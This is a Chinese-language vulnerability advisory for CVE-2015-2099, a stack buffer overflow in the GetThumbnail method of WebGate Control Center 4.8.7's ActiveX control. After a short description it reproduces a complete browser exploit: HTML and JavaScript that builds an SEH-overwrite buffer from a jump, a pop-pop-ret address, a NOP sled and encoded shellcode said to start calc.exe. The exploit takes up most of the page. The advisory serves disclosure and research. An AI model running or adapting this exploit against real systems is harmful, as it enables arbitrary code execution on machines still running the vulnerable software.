内容安全 
大数据安全 
网络安全 
更多产品 
WebGate Control Center 4.8.7 GetThumbnail栈溢出漏洞
发表日期:2015-04-02 10:20:12
WebGate Control Center 4.8.7 GetThumbnail栈溢出漏洞
CVE-ID:CVE-2015-2099
发布日期:2015-03-27
更新日期:2015-03-30
受影响系统:
Webgate WebGate Control Center 4.8.7
Webgate WebGate Control Center
详细信息:
WebGate Control Center是网络视频监控终端的中心监控程序。
WESPPlayback.WESPPlaybackCtrl.1控制存在安全漏洞,GetThumbnail方法复制任意数据到固定大小的栈缓冲区,这可使攻击者在受影响浏览器上下文中执行任意代码。
来源:
rgod (rgod@autistici.org)
参考信息:
http://www.zerodayinitiative.com/advisories/ZDI-15-063/
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2099
targetFile = "C:\\WINDOWS\\system32\\WESPSDK\\WESPPlayback.dll"
prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid=\'clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8\' id=\'getthumb\'>
</object>
<script>
var buff1 = "";
var arg2=1;
var arg3=1;
var arg4=1;
var nops = "";
var buff2 = "";
for (i=0;i<24; i++)
{
buff1 += "B";
}
// jump over seh to shellcode
nseh = "\\xeb\\x08PD";
// pop pop ret
var seh = "\\xa0\\xf2\\x07\\x10";
for (i=0;i<80; i++)
{
nops += "\\x90";
}
//calc.exe payload
sc = "\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49" +
"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30" +
"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30" +
"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42" +
"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a" +
"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30" +
"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c" +
"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b" +
"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38" +
"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c" +
"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48" +
"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32" +
"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37" +
"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58" +
"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53" +
"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a" +
"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56" +
"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51" +
"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43" +
"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34" +
"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42" +
"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c" +
"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48" +
"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b" +
"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31" +
"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d" +
"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43" +
"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b" +
"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48" +
"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d" +
"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45" +
"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b" +
"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46" +
"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43" +
"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41";
for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);
</script>
</html>
解决办法:
厂商补丁:
Webgate
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
